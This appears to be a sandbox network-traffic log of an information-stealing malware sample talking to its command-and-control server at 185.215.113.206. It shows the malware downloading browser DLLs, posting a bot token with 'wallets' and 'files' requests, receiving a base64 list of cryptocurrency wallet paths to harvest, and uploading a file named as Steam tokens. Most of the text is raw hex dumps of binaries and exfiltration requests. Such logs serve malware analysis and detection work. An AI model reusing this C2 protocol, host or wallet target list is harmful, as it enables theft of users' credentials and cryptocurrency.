                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047420979 CET1236INData Raw: 03 00 00 00 29 c8 c1 f8 1f 80 7c 33 f4 01 19 db f7 d0 09 c3 21 fb b8 04 00 00 00 29 c8 c1 f8 1f 8b 7d 1c 80 7c 37 f3 01 f7 d0 19 ff 09 c7 21 df 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1
                                                                                                                                                                                                                                                                                        Data Ascii: )|3!)}|7!!)U|2)|2!!)M|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047434092 CET124INData Raw: c4 08 c7 47 08 01 00 00 00 57 e8 3a fc 07 00 83 c4 04 eb 09 c7 47 08 01 00 00 00 89 fe 89 f0 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: GW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047445059 CET1236INData Raw: c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 c0 74 3d 89 f1 8b 55 10 ff 75 18 ff
                                                                                                                                                                                                                                                                                        Data Ascii: %tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@H
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.048896074 CET1236INData Raw: 53 ff 75 08 57 e8 97 f7 07 00 83 c4 0c 0f b6 8d f0 fe ff ff 8b b5 ec fe ff ff 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f
                                                                                                                                                                                                                                                                                        Data Ascii: SuWT>\>=t%>>fM1^_[]U}thuo]UVuE9sh;UMVuPu^]
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.675220966 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.874934912 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:16 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.094830990 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.294604063 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:17 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.371972084 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.571811914 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:17 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:17.873370886 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.073086023 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:17 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.209928036 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410538912 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:18 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.039602041 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFH
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 1067
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.740442991 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:19 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.786758900 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJ
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="message"wallets------KFIDBAFHCAKFBGCBFHIJ--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.996259928 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:19 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 2408
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.998883009 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 265
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="message"files------IDHIEGIIIECAKEBFBAAE--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.200301886 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:20 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.220994949 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"------BKJKJEHJJDAKECBFCGID--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.919779062 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:20 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.075103045 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 272
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
